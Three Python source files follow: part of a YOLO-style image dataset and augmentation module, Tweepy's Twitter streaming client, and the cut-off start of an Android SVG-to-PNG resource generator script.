if nL:
labels[:, 2] = 1 - labels[:, 2]
# flip left-right
if random.random() < hyp['fliplr']:
img = np.fliplr(img)
if nL:
labels[:, 1] = 1 - labels[:, 1]
labels_out = torch.zeros((nL, 6))
if nL:
labels_out[:, 1:] = torch.from_numpy(labels)
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return torch.from_numpy(img), labels_out, self.img_files[index], shapes
def getitem(self, iid):
# Inference-only variant of __getitem__; label handling is disabled below.
index = iid # alias so the shared loading code matches __getitem__ (was undefined)
hyp = self.hyp
mosaic = self.mosaic and random.random() < hyp['mosaic']
if mosaic:
# Load mosaic
img, labels = load_mosaic(self, index)
shapes = None
# MixUp https://arxiv.org/pdf/1710.09412.pdf
if random.random() < hyp['mixup']:
img2, labels2 = load_mosaic(self, random.randint(0, self.n - 1))
r = np.random.beta(8.0, 8.0) # mixup ratio, alpha=beta=8.0
img = (img * r + img2 * (1 - r)).astype(np.uint8)
labels = np.concatenate((labels, labels2), 0)
else:
# Load image
img, (h0, w0), (h, w) = load_image(self, index)
# Letterbox
shape = self.batch_shapes[self.batch[index]] if self.rect else self.img_size # final letterboxed shape
img, ratio, pad = letterbox(img, shape, auto=False,
scaleup=self.augment)
shapes = (h0, w0), ((h / h0, w / w0), pad) # for COCO mAP rescaling
# Load labels
# labels = []
# x = self.labels[index]
# if x.size > 0:
# # Normalized xywh to pixel xyxy format
# labels = x.copy()
# labels[:, 1] = ratio[0] * w * (x[:, 1] - x[:, 3] / 2) + pad[
# 0] # pad width
# labels[:, 2] = ratio[1] * h * (x[:, 2] - x[:, 4] / 2) + pad[
# 1] # pad height
# labels[:, 3] = ratio[0] * w * (x[:, 1] + x[:, 3] / 2) + pad[0]
# labels[:, 4] = ratio[1] * h * (x[:, 2] + x[:, 4] / 2) + pad[1]
# if self.augment:
# # Augment imagespace
# if not mosaic:
# img, labels = random_perspective(img, labels,
# degrees=hyp['degrees'],
# translate=hyp['translate'],
# scale=hyp['scale'],
# shear=hyp['shear'],
# perspective=hyp['perspective'])
#
# # Augment colorspace
# augment_hsv(img, hgain=hyp['hsv_h'], sgain=hyp['hsv_s'],
# vgain=hyp['hsv_v'])
# Apply cutouts
# if random.random() < 0.9:
# labels = cutout(img, labels)
# nL = len(labels) # number of labels
# if nL:
# labels[:, 1:5] = xyxy2xywh(labels[:, 1:5]) # convert xyxy to xywh
# labels[:, [2, 4]] /= img.shape[0] # normalized height 0-1
# labels[:, [1, 3]] /= img.shape[1] # normalized width 0-1
# if self.augment:
# # flip up-down
# if random.random() < hyp['flipud']:
# img = np.flipud(img)
# if nL:
# labels[:, 2] = 1 - labels[:, 2]
#
# # flip left-right
# if random.random() < hyp['fliplr']:
# img = np.fliplr(img)
# if nL:
# labels[:, 1] = 1 - labels[:, 1]
#
# labels_out = torch.zeros((nL, 6))
# if nL:
# labels_out[:, 1:] = torch.from_numpy(labels)
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return torch.from_numpy(img) # labels_out, self.img_files[index], shapes
@staticmethod
def collate_fn(batch):
img, label, path, shapes = zip(*batch) # transposed
for i, l in enumerate(label):
l[:, 0] = i # add target image index for build_targets()
return torch.stack(img, 0), torch.cat(label, 0), path, shapes
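# Usage sketch (illustrative): collate_fn stamps each label row with its image
# index for build_targets(), so pass it explicitly to the DataLoader.
#   loader = torch.utils.data.DataLoader(dataset, batch_size=16,
#                                        collate_fn=LoadImagesAndLabels.collate_fn)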
# Ancillary functions
def load_image(self, index):
# loads 1 image from dataset, returns img, original hw, resized hw
img = self.imgs[index]
if img is None: # not cached
path = self.img_files[index]
img = cv2.imread(path) # BGR
assert img is not None, 'Image Not Found ' + path
h0, w0 = img.shape[:2] # orig hw
r = self.img_size / max(h0, w0) # resize image to img_size
if r != 1: # always resize down, only resize up if training with augmentation
interp = cv2.INTER_AREA if r < 1 and not self.augment else cv2.INTER_LINEAR
img = cv2.resize(img, (int(w0 * r), int(h0 * r)),
interpolation=interp)
return img, (h0, w0), img.shape[:2] # img, hw_original, hw_resized
else:
return self.imgs[index], self.img_hw0[index], self.img_hw[index] # img, hw_original, hw_resized
def augment_hsv(img, hgain=0.5, sgain=0.5, vgain=0.5):
r = np.random.uniform(-1, 1, 3) * [hgain, sgain, vgain] + 1 # random gains
hue, sat, val = cv2.split(cv2.cvtColor(img, cv2.COLOR_BGR2HSV))
dtype = img.dtype # uint8
x = np.arange(0, 256, dtype=np.int16)
lut_hue = ((x * r[0]) % 180).astype(dtype)
lut_sat = np.clip(x * r[1], 0, 255).astype(dtype)
lut_val = np.clip(x * r[2], 0, 255).astype(dtype)
img_hsv = cv2.merge((cv2.LUT(hue, lut_hue), cv2.LUT(sat, lut_sat),
cv2.LUT(val, lut_val))).astype(dtype)
cv2.cvtColor(img_hsv, cv2.COLOR_HSV2BGR, dst=img) # no return needed
# Histogram equalization
# if random.random() < 0.2:
# for i in range(3):
# img[:, :, i] = cv2.equalizeHist(img[:, :, i])
def load_mosaic(self, index):
# loads images in a mosaic
labels4 = []
s = self.img_size
yc, xc = [int(random.uniform(-x, 2 * s + x)) for x in
self.mosaic_border] # mosaic center x, y
indices = [index] + [self.indices[random.randint(0, self.n - 1)] for _ in
range(3)] # 3 additional image indices
for i, index in enumerate(indices):
# Load image
img, _, (h, w) = load_image(self, index)
# place img in img4
if i == 0: # top left
img4 = np.full((s * 2, s * 2, img.shape[2]), 114,
dtype=np.uint8) # base image with 4 tiles
x1a, y1a, x2a, y2a = max(xc - w, 0), max(yc - h, 0), xc, yc # xmin, ymin, xmax, ymax (large image)
x1b, y1b, x2b, y2b = w - (x2a - x1a), h - (y2a - y1a), w, h # xmin, ymin, xmax, ymax (small image)
elif i == 1: # top right
x1a, y1a, x2a, y2a = xc, max(yc - h, 0), min(xc + w, s * 2), yc
x1b, y1b, x2b, y2b = 0, h - (y2a - y1a), min(w, x2a - x1a), h
elif i == 2: # bottom left
x1a, y1a, x2a, y2a = max(xc - w, 0), yc, xc, min(s * 2, yc + h)
x1b, y1b, x2b, y2b = w - (x2a - x1a), 0, w, min(y2a - y1a, h)
elif i == 3: # bottom right
x1a, y1a, x2a, y2a = xc, yc, min(xc + w, s * 2), min(s * 2, yc + h)
x1b, y1b, x2b, y2b = 0, 0, min(w, x2a - x1a), min(y2a - y1a, h)
img4[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b] # img4[ymin:ymax, xmin:xmax]
padw = x1a - x1b
padh = y1a - y1b
# Labels
x = self.labels[index]
labels = x.copy()
if x.size > 0: # Normalized xywh to pixel xyxy format
labels[:, 1] = w * (x[:, 1] - x[:, 3] / 2) + padw
labels[:, 2] = h * (x[:, 2] - x[:, 4] / 2) + padh
labels[:, 3] = w * (x[:, 1] + x[:, 3] / 2) + padw
labels[:, 4] = h * (x[:, 2] + x[:, 4] / 2) + padh
labels4.append(labels)
# Concat/clip labels
if len(labels4):
labels4 = np.concatenate(labels4, 0)
np.clip(labels4[:, 1:], 0, 2 * s,
out=labels4[:, 1:]) # use with random_perspective
# img4, labels4 = replicate(img4, labels4) # replicate
# Augment
img4, labels4 = random_perspective(img4, labels4,
degrees=self.hyp['degrees'],
translate=self.hyp['translate'],
scale=self.hyp['scale'],
shear=self.hyp['shear'],
perspective=self.hyp['perspective'],
border=self.mosaic_border) # border to remove
return img4, labels4
def replicate(img, labels):
# Replicate labels
h, w = img.shape[:2]
boxes = labels[:, 1:].astype(int)
x1, y1, x2, y2 = boxes.T
s = ((x2 - x1) + (y2 - y1)) / 2 # side length (pixels)
for i in s.argsort()[:round(s.size * 0.5)]: # smallest indices
x1b, y1b, x2b, y2b = boxes[i]
bh, bw = y2b - y1b, x2b - x1b
yc, xc = int(random.uniform(0, h - bh)), int(random.uniform(0, w - bw)) # offset y, x
x1a, y1a, x2a, y2a = [xc, yc, xc + bw, yc + bh]
img[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b] # img[ymin:ymax, xmin:xmax]
labels = np.append(labels, [[labels[i, 0], x1a, y1a, x2a, y2a]], axis=0)
return img, labels
def letterbox(img, new_shape=(640, 640), color=(114, 114, 114), auto=True,
scaleFill=False, scaleup=True):
# Resize image to a 32-pixel-multiple rectangle https://github.com/ultralytics/yolov3/issues/232
shape = img.shape[:2] # current shape [height, width]
if isinstance(new_shape, int):
new_shape = (new_shape, new_shape)
# Scale ratio (new / old)
r = min(new_shape[0] / shape[0], new_shape[1] / shape[1])
if not scaleup: # only scale down, do not scale up (for better test mAP)
r = min(r, 1.0)
# Compute padding
ratio = r, r # width, height ratios
new_unpad = int(round(shape[1] * r)), int(round(shape[0] * r))
dw, dh = new_shape[1] - new_unpad[0], new_shape[0] - new_unpad[1] # wh padding
if auto: # minimum rectangle
dw, dh = np.mod(dw, 32), np.mod(dh, 32) # wh padding
elif scaleFill: # stretch
dw, dh = 0.0, 0.0
new_unpad = (new_shape[1], new_shape[0])
ratio = new_shape[1] / shape[1], new_shape[0] / shape[0] # width, height ratios
dw /= 2 # divide padding into 2 sides
dh /= 2
if shape[::-1] != new_unpad: # resize
img = cv2.resize(img, new_unpad, interpolation=cv2.INTER_LINEAR)
top, bottom = int(round(dh - 0.1)), int(round(dh + 0.1))
left, right = int(round(dw - 0.1)), int(round(dw + 0.1))
img = cv2.copyMakeBorder(img, top, bottom, left, right, cv2.BORDER_CONSTANT,
value=color) # add border
return img, ratio, (dw, dh)
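# Worked example (illustrative): a 1280x720 image with new_shape=640 and
# auto=True gives r=0.5, new_unpad=(640, 360), dh=280 -> mod 32 -> 24 total,
# i.e. 12 px of gray padding top and bottom for a final 640x384 canvas.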
def random_perspective(img, targets=(), degrees=10, translate=.1, scale=.1,
shear=10, perspective=0.0, border=(0, 0)):
# torchvision.transforms.RandomAffine(degrees=(-10, 10), translate=(.1, .1), scale=(.9, 1.1), shear=(-10, 10))
# targets = [cls, xyxy]
height = img.shape[0] + border[0] * 2 # shape(h,w,c)
width = img.shape[1] + border[1] * 2
# Center
C = np.eye(3)
C[0, 2] = -img.shape[1] / 2 # x translation (pixels)
C[1, 2] = -img.shape[0] / 2 # y translation (pixels)
# Perspective
P = np.eye(3)
P[2, 0] = random.uniform(-perspective,
perspective) # x perspective (about y)
P[2, 1] = random.uniform(-perspective,
perspective) # y perspective (about x)
# Rotation and Scale
R = np.eye(3)
a = random.uniform(-degrees, degrees)
# a += random.choice([-180, -90, 0, 90]) # add 90deg rotations to small rotations
s = random.uniform(1 - scale, 1 + scale)
# s = 2 ** random.uniform(-scale, scale)
R[:2] = cv2.getRotationMatrix2D(angle=a, center=(0, 0), scale=s)
# Shear
S = np.eye(3)
S[0, 1] = math.tan(
random.uniform(-shear, shear) * math.pi / 180) # x shear (deg)
S[1, 0] = math.tan(
random.uniform(-shear, shear) * math.pi / 180) # y shear (deg)
# Translation
T = np.eye(3)
T[0, 2] = random.uniform(0.5 - translate,
0.5 + translate) * width # x translation (pixels)
T[1, 2] = random.uniform(0.5 - translate,
0.5 + translate) * height # y translation (pixels)
# Combined rotation matrix
M = T @ S @ R @ P @ C # order of operations (right to left) is IMPORTANT
if (border[0] != 0) or (border[1] != 0) or (M != np.eye(3)).any(): # image changed
if perspective:
img = cv2.warpPerspective(img, M, dsize=(width, height),
borderValue=(114, 114, 114))
else: # affine
img = cv2.warpAffine(img, M[:2], dsize=(width, height),
borderValue=(114, 114, 114))
# Visualize
# import matplotlib.pyplot as plt
# ax = plt.subplots(1, 2, figsize=(12, 6))[1].ravel()
# ax[0].imshow(img[:, :, ::-1]) # base
# ax[1].imshow(img2[:, :, ::-1]) # warped
# Transform label coordinates
n = len(targets)
if n:
# warp points
xy = np.ones((n * 4, 3))
xy[:, :2] = targets[:, [1, 2, 3, 4, 1, 4, 3, 2]].reshape(n * 4, 2) # x1y1, x2y2, x1y2, x2y1
xy = xy @ M.T # transform
if perspective:
xy = (xy[:, :2] / xy[:, 2:3]).reshape(n, 8) # rescale
else: # affine
xy = xy[:, :2].reshape(n, 8)
# create new boxes
x = xy[:, [0, 2, 4, 6]]
y = xy[:, [1, 3, 5, 7]]
xy = np.concatenate((x.min(1), y.min(1), x.max(1), y.max(1))).reshape(4, n).T
# # apply angle-based reduction of bounding boxes
# radians = a * math.pi / 180
# reduction = max(abs(math.sin(radians)), abs(math.cos(radians))) ** 0.5
# x = (xy[:, 2] + xy[:, 0]) / 2
# y = (xy[:, 3] + xy[:, 1]) / 2
# w = (xy[:, 2] - xy[:, 0]) * reduction
# h = (xy[:, 3] - xy[:, 1]) * reduction
# xy = np.concatenate((x - w / 2, y - h / 2, x + w / 2, y + h / 2)).reshape(4, n).T
# clip boxes
xy[:, [0, 2]] = xy[:, [0, 2]].clip(0, width)
xy[:, [1, 3]] = xy[:, [1, 3]].clip(0, height)
# filter candidates
i = box_candidates(box1=targets[:, 1:5].T * s, box2=xy.T)
targets = targets[i]
targets[:, 1:5] = xy[i]
return img, targets
def box_candidates(box1, box2, wh_thr=2, ar_thr=20,
area_thr=0.1): # box1(4,n), box2(4,n)
# Compute candidate boxes: box1 before augment, box2 after augment, wh_thr (pixels), aspect_ratio_thr, area_ratio
w1, h1 = box1[2] - box1[0], box1[3] - box1[1]
w2, h2 = box2[2] - box2[0], box2[3] - box2[1]
ar = np.maximum(w2 / (h2 + 1e-16), h2 / (w2 + 1e-16)) # aspect ratio
return (w2 > wh_thr) & (h2 > wh_thr) & (w2 * h2 / (w1 * h1 + 1e-16) > area_thr) & (ar < ar_thr) # candidates
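# Example (illustrative): a 100x100 box that shrinks to 40x40 after warping
# keeps wh > 2 px, area ratio 0.16 > 0.1 and aspect ratio 1 < 20, so it survives.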
def cutout(image, labels):
# Applies image cutout augmentation https://arxiv.org/abs/1708.04552
h, w = image.shape[:2]
def bbox_ioa(box1, box2):
# Returns the intersection over box2 area given box1, box2. box1 is 4, box2 is nx4. boxes are x1y1x2y2
box2 = box2.transpose()
# Get the coordinates of bounding boxes
b1_x1, b1_y1, b1_x2, b1_y2 = box1[0], box1[1], box1[2], box1[3]
b2_x1, b2_y1, b2_x2, b2_y2 = box2[0], box2[1], box2[2], box2[3]
# Intersection area
inter_area = (np.minimum(b1_x2, b2_x2) - np.maximum(b1_x1, b2_x1)).clip(0) * \
(np.minimum(b1_y2, b2_y2) - np.maximum(b1_y1, b2_y1)).clip(0)
# box2 area
box2_area = (b2_x2 - b2_x1) * (b2_y2 - b2_y1) + 1e-16
# Intersection over box2 area
return inter_area / box2_area
# create random masks
scales = [0.5] * 1 + [0.25] * 2 + [0.125] * 4 + [0.0625] * 8 + [0.03125] * 16 # image size fraction
for s in scales:
mask_h = random.randint(1, int(h * s))
mask_w = random.randint(1, int(w * s))
# box
xmin = max(0, random.randint(0, w) - mask_w // 2)
ymin = max(0, random.randint(0, h) - mask_h // 2)
xmax = min(w, xmin + mask_w)
ymax = min(h, ymin + mask_h)
# apply random color mask
image[ymin:ymax, xmin:xmax] = [random.randint(64, 191) for _ in
range(3)]
# return unobscured labels
if len(labels) and s > 0.03:
box = np.array([xmin, ymin, xmax, ymax], dtype=np.float32)
ioa = bbox_ioa(box, labels[:, 1:5]) # intersection over area
labels = labels[ioa < 0.60] # remove >60% obscured labels
return labels
def create_folder(path='./new'):
# Create folder
if os.path.exists(path):
shutil.rmtree(path) # delete output folder
os.makedirs(path) # make new output folder
def flatten_recursive(path='../coco128'):
# Flatten a recursive directory by bringing all files to top level
new_path = Path(path + '_flat')
create_folder(new_path)
for file in tqdm(glob.glob(str(Path(path)) + '/**/*.*', recursive=True)):
shutil.copyfile(file, new_path / Path(file).name)
def extract_boxes(path='../coco128/'): # from utils.datasets import *; extract_boxes('../coco128')
# Convert detection dataset into classification dataset, with one directory per class
path = Path(path) # images dir
if (path / 'classifier').is_dir():
shutil.rmtree(path / 'classifier') # remove existing
files = list(path.rglob('*.*'))
n = len(files) # number of files
for im_file in tqdm(files, total=n):
if im_file.suffix[1:] in img_formats:
# image
im = cv2.imread(str(im_file))[..., ::-1] # BGR to RGB
h, w = im.shape[:2]
# labels
lb_file = Path(img2label_paths([str(im_file)])[0])
if Path(lb_file).exists():
with open(lb_file, 'r') as f:
lb = np.array(
[x.split() for x in f.read().strip().splitlines()],
dtype=np.float32) # labels
for j, x in enumerate(lb):
c = int(x[0]) # class
f = (path / 'classifier') / f'{c}' / f'{path.stem}_{im_file.stem}_{j}.jpg' # new filename
if not f.parent.is_dir():
f.parent.mkdir(parents=True)
b = x[1:] * [w, h, w, h] # box
# b[2:] = b[2:].max() # rectangle to square
b[2:] = b[2:] * 1.2 + 3 # pad
b = xywh2xyxy(b.reshape(-1, 4)).ravel().astype(int) # np.int is deprecated
b[[0, 2]] = np.clip(b[[0, 2]], 0, w) # clip boxes outside of image
b[[1, 3]] = np.clip(b[[1, 3]], 0, h)
assert cv2.imwrite(str(f), im[b[1]:b[3], b[0]:b[2]]), f'box failure in {f}'
def autosplit(path='../coco128', weights=(0.9, 0.1, 0.0)): # from utils.datasets import *; autosplit('../coco128')
""" Autosplit a dataset into train/val/test splits and save path/autosplit_*.txt files
# Arguments
path: Path to images directory
weights: Train, val, test weights (list)
"""
path = Path(path) # images dir
files = list(path.rglob('*.*'))
n = len(files) # number of files
indices = random.choices([0, 1, 2], weights=weights,
k=n) # assign each image to a split
txt = ['autosplit_train.txt', 'autosplit_val.txt',
'autosplit_test.txt'] # 3 txt files
[(path / x).unlink() for x in txt if (path / x).exists()] # remove existing
for i, img in tqdm(zip(indices, files), total=n):
if img.suffix[1:] in img_formats:
with open(path / txt[i], 'a') as f:
f.write(str(img) + '\n') # add image to txt file
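# Usage sketch (illustrative): autosplit('../coco128', weights=(0.8, 0.2, 0.0))
# writes autosplit_train.txt and autosplit_val.txt next to the images, each
# listing the image paths assigned to that split (a zero-weight split gets no file).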
|
streaming.py | # Tweepy
# Copyright 2009-2010 Joshua Roesslein
# See LICENSE for details.
import logging
import requests
from requests.exceptions import Timeout
from threading import Thread
from time import sleep
from HTMLParser import HTMLParser
import ssl
from tweepy.models import Status
from tweepy.api import API
from tweepy.error import TweepError
from tweepy.utils import import_simplejson, urlencode_noplus
json = import_simplejson()
STREAM_VERSION = '1.1'
class StreamListener(object):
def __init__(self, api=None):
self.api = api or API()
def on_connect(self):
"""Called once connected to streaming server.
This will be invoked once a successful response
is received from the server. Allows the listener
to perform some work prior to entering the read loop.
"""
pass
def on_data(self, raw_data):
"""Called when raw data is received from connection.
Override this method if you wish to manually handle
the stream data. Return False to stop stream and close connection.
"""
data = json.loads(HTMLParser().unescape(raw_data))
if 'in_reply_to_status_id' in data:
status = Status.parse(self.api, data)
if self.on_status(status) is False:
return False
elif 'delete' in data:
delete = data['delete']['status']
if self.on_delete(delete['id'], delete['user_id']) is False:
return False
elif 'event' in data:
status = Status.parse(self.api, data)
if self.on_event(status) is False:
return False
elif 'direct_message' in data:
status = Status.parse(self.api, data)
if self.on_direct_message(status) is False:
return False
elif 'friends' in data:
if self.on_friends(data['friends']) is False:
return False
elif 'limit' in data:
if self.on_limit(data['limit']['track']) is False:
return False
elif 'disconnect' in data:
if self.on_disconnect(data['disconnect']) is False:
return False
else:
logging.error("Unknown message type: " + str(raw_data))
def on_status(self, status):
"""Called when a new status arrives"""
return
def on_exception(self, exception):
"""Called when an unhandled exception occurs."""
return
def on_delete(self, status_id, user_id):
"""Called when a delete notice arrives for a status"""
return
def on_event(self, status):
"""Called when a new event arrives"""
return
def on_direct_message(self, status):
"""Called when a new direct message arrives"""
return
def on_friends(self, friends):
"""Called when a friends list arrives.
friends is a list that contains user_id
"""
return
def on_limit(self, track):
"""Called when a limitation notice arrvies"""
return
def on_error(self, status_code):
"""Called when a non-200 status code is returned"""
return False
def on_timeout(self):
"""Called when stream connection times out"""
return
def on_disconnect(self, notice):
"""Called when twitter sends a disconnect notice
Disconnect codes are listed here:
https://dev.twitter.com/docs/streaming-apis/messages#Disconnect_messages_disconnect
"""
return
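# Minimal listener sketch (illustrative, not part of the original module):
# subclass StreamListener and override the callbacks you need; returning
# False from on_data/on_status closes the connection.
#   class PrintListener(StreamListener):
#       def on_status(self, status):
#           print(status.text)
#       def on_error(self, status_code):
#           return status_code != 420  # back off on rate limiting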
class Stream(object):
host = 'stream.twitter.com'
def __init__(self, auth, listener, **options):
self.auth = auth
self.listener = listener
self.running = False
self.timeout = options.get("timeout", 300.0)
self.retry_count = options.get("retry_count")
# values according to https://dev.twitter.com/docs/streaming-apis/connecting#Reconnecting
self.retry_time_start = options.get("retry_time", 5.0)
self.retry_420_start = options.get("retry_420", 60.0)
self.retry_time_cap = options.get("retry_time_cap", 320.0)
self.snooze_time_step = options.get("snooze_time", 0.25)
self.snooze_time_cap = options.get("snooze_time_cap", 16)
self.buffer_size = options.get("buffer_size", 1500)
self.api = API()
self.session = requests.Session()
self.session.headers = options.get("headers") or {}
self.session.params = None
self.body = None
self.retry_time = self.retry_time_start
self.snooze_time = self.snooze_time_step
def _run(self):
# Authenticate
url = "https://%s%s" % (self.host, self.url)
# Connect and process the stream
error_counter = 0
resp = None
exception = None
while self.running:
if self.retry_count is not None and error_counter > self.retry_count:
# quit if error count greater than retry count
break
try:
auth = self.auth.apply_auth()
resp = self.session.request('POST', url, data=self.body,
timeout=self.timeout, stream=True, auth=auth)
if resp.status_code != 200:
if self.listener.on_error(resp.status_code) is False:
break
error_counter += 1
if resp.status_code == 420:
self.retry_time = max(self.retry_420_start, self.retry_time)
sleep(self.retry_time)
self.retry_time = min(self.retry_time * 2, self.retry_time_cap)
else:
error_counter = 0
self.retry_time = self.retry_time_start
self.snooze_time = self.snooze_time_step
self.listener.on_connect()
self._read_loop(resp)
except (Timeout, ssl.SSLError) as exc:
# This is still necessary, as a SSLError can actually be thrown when using Requests
# If it's not time out treat it like any other exception
if isinstance(exc, ssl.SSLError) and not (exc.args and 'timed out' in str(exc.args[0])):
exception = exc
break
if self.listener.on_timeout() == False:
break
if self.running is False:
break
sleep(self.snooze_time)
self.snooze_time = min(self.snooze_time + self.snooze_time_step,
self.snooze_time_cap)
except Exception as exception:
# any other exception is fatal, so kill loop
break
# cleanup
self.running = False
if resp:
resp.close()
self.session = requests.Session()
if exception:
# call a handler first so that the exception can be logged.
self.listener.on_exception(exception)
raise
def _data(self, data):
if self.listener.on_data(data) is False:
self.running = False
def _read_loop(self, resp):
while self.running:
# Note: keep-alive newlines might be inserted before each length value.
# read until we get a digit...
c = '\n'
for c in resp.iter_content():
if c == '\n':
continue
break
delimited_string = c
# read rest of delimiter length..
d = ''
for d in resp.iter_content():
if d != '\n':
delimited_string += d
continue
break
# read the next twitter status object
if delimited_string.strip().isdigit():
next_status_obj = resp.raw.read(int(delimited_string))
if self.running:
self._data(next_status_obj)
if resp.raw._fp.isclosed():
self.on_closed(resp)
def _start(self, async):
self.running = True
if async:
self._thread = Thread(target=self._run)
self._thread.start()
else:
self._run()
def on_closed(self, resp):
""" Called when the response has been closed by Twitter """
pass
def userstream(self, stall_warnings=False, _with=None, replies=None,
track=None, locations=None, async=False, encoding='utf8'):
self.session.params = {'delimited': 'length'}
if self.running:
raise TweepError('Stream object already connected!')
self.url = '/%s/user.json' % STREAM_VERSION
self.host='userstream.twitter.com'
if stall_warnings:
self.session.params['stall_warnings'] = stall_warnings
if _with:
self.session.params['with'] = _with
if replies:
self.session.params['replies'] = replies
if locations and len(locations) > 0:
if len(locations) % 4 != 0:
raise TweepError("Wrong number of locations points, "
"it has to be a multiple of 4")
self.session.params['locations'] = ','.join(['%.2f' % l for l in locations])
if track:
encoded_track = [s.encode(encoding) for s in track]
self.session.params['track'] = ','.join(encoded_track)
self._start(async)
def firehose(self, count=None, async=False):
self.session.params = {'delimited': 'length'}
if self.running:
raise TweepError('Stream object already connected!')
self.url = '/%s/statuses/firehose.json' % STREAM_VERSION
if count:
self.url += '&count=%s' % count
self._start(async)
def retweet(self, async=False):
self.session.params = {'delimited': 'length'}
if self.running:
raise TweepError('Stream object already connected!')
self.url = '/%s/statuses/retweet.json' % STREAM_VERSION
self._start(async)
def sample(self, async=False, language=None):
if self.running:
raise TweepError('Stream object already connected!')
self.url = '/%s/statuses/sample.json?delimited=length' % STREAM_VERSION
if language:
self.url += '&language=%s' % language # self.parameters is never initialized in sample(), so pass language via the URL only
self._start(async)
def filter(self, follow=None, track=None, async=False, locations=None,
stall_warnings=False, languages=None, encoding='utf8'):
self.session.params = {}
self.session.headers['Content-type'] = "application/x-www-form-urlencoded"
if self.running:
raise TweepError('Stream object already connected!')
self.url = '/%s/statuses/filter.json' % STREAM_VERSION
if follow:
encoded_follow = [s.encode(encoding) for s in follow]
self.session.params['follow'] = ','.join(encoded_follow)
if track:
encoded_track = [s.encode(encoding) for s in track]
self.session.params['track'] = ','.join(encoded_track)
if locations and len(locations) > 0:
if len(locations) % 4 != 0:
raise TweepError("Wrong number of locations points, "
"it has to be a multiple of 4")
self.session.params['locations'] = ','.join(['%.4f' % l for l in locations])
if stall_warnings:
self.session.params['stall_warnings'] = stall_warnings
if languages:
self.session.params['language'] = ','.join(map(str, languages))
self.body = urlencode_noplus(self.session.params)
self.session.params['delimited'] = 'length'
self.host = 'stream.twitter.com'
self._start(async)
def sitestream(self, follow, stall_warnings=False, with_='user', replies=False, async=False):
self.parameters = {}
if self.running:
raise TweepError('Stream object already connected!')
self.url = '/%s/site.json' % STREAM_VERSION
self.parameters['follow'] = ','.join(map(str, follow))
self.parameters['delimited'] = 'length'
if stall_warnings:
self.parameters['stall_warnings'] = stall_warnings
if with_:
self.parameters['with'] = with_
if replies:
self.parameters['replies'] = replies
self.body = urlencode_noplus(self.parameters)
self._start(async)
def disconnect(self):
if self.running is False:
return
self.running = False
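# Usage sketch (illustrative; credentials are placeholders): wire an
# authenticated handler to a listener and start a filtered stream.
#   auth = tweepy.OAuthHandler(consumer_key, consumer_secret)
#   auth.set_access_token(access_token, access_token_secret)
#   stream = Stream(auth, PrintListener())
#   stream.filter(track=['python'], async=True)  # async=True runs in a thread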
|
generate.py | #!python3
# -*- coding: utf-8 -*-
# The MIT License (MIT)
#
# Copyright (c) 2015 Lucas Nunes de Lima
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#-------------------------------------------------------------------------------
# Android SVG to Android Resource
# Requires:
# inkscape
# pngout
# python3 (of course)
import os
import glob
import xml.etree.ElementTree as ET
import subprocess
import platform
import sys
import shelve
import threading
import time
import settings
import ignore
import convert_jpg
print('RES Builder')
print('----------------------------------------------------------')
# Get inkscape path
if len(settings.inkscape_path) == 0:
print('Invalid inkscape path. Aborted.')
exit(-1)
else:
sys.path.insert(0, settings.inkscape_path)
# Target DPI:
# [0.75, 1.0, 1.5, 2.0, 3.0, 4.0]
# ['ldpi', 'mdpi', 'hdpi', 'xhdpi', 'xxhdpi', 'xxxhdpi']
base_dpi = 1.0
dpis = {'ldpi' : 0.75 / base_dpi, 'mdpi' : 1.0 / base_dpi,
'hdpi' : 1.5 / base_dpi, 'xhdpi' : 2.0 / base_dpi,
'xxhdpi' : 3.0 / base_dpi, 'xxxhdpi' : 4.0 / base_dpi}
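# Example (illustrative): with base_dpi = 1.0, a 48x48 px mdpi source renders
# at 36 px (ldpi), 72 px (hdpi), 96 px (xhdpi), 144 px (xxhdpi) and 192 px (xxxhdpi).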
# Shared lock guarding the svgs work list; a Lock() created inside each call
# would be private to that call and provide no mutual exclusion.
lock = threading.Lock()
def do_work():
while 1:
with lock:
if len(svgs) == 0:
break
process_svg()
pass
def process_svg():
global index
# uses the shared module-level lock defined above
with lock:
if len(svgs) == 0:
return
svg = svgs[0]
svgs.remove(svg)
svg = os.path.normpath(svg)
svg = svg.replace('\\\\','/').replace('\\','/').replace('//','/')
tree = ET.parse(svg)
root = tree.getroot()
widthStr = root.attrib['width']
heightStr = root.attrib['height']
base_path = svg.replace(working_dir, '')
print_name = base_path.replace(current_input_path, '')
if widthStr.find('%') != -1:
viewBox = root.attrib['viewBox'].split(' ')
widthStr = viewBox[2]
heightStr = viewBox[3]
widthStr = widthStr.replace('px','')
heightStr = heightStr.replace('px','')
width = float(widthStr)
height = float(heightStr)
for index in range(len(settings.output_quality)):
dpi_name = settings.output_quality[index]
dpi = dpis[dpi_name]
twidth = float(round(width * dpi))
theight = float(round(height * dpi))
target = os.path.basename(svg)
target = target.replace('.svg', '.png')
target = target.lower()
ignore_it = False
for ignored_file in ignore.files:
if os.path.normpath(ignored_file) == os.path.normpath(base_path):
ignore_it = True
break
thread_name = '[' + threading.current_thread().name + '] '
if ignore_it:
with lock:
print(thread_name + print_name + ' > ignored')
break
else:
with lock:
print(thread_name + print_name + ' > ' + dpi_name)
is_mipmap = 'ic_launcher' in os.path.normpath(base_path)
is_adaptive = 'ic_launcher_adaptive' in os.path.normpath(base_path)
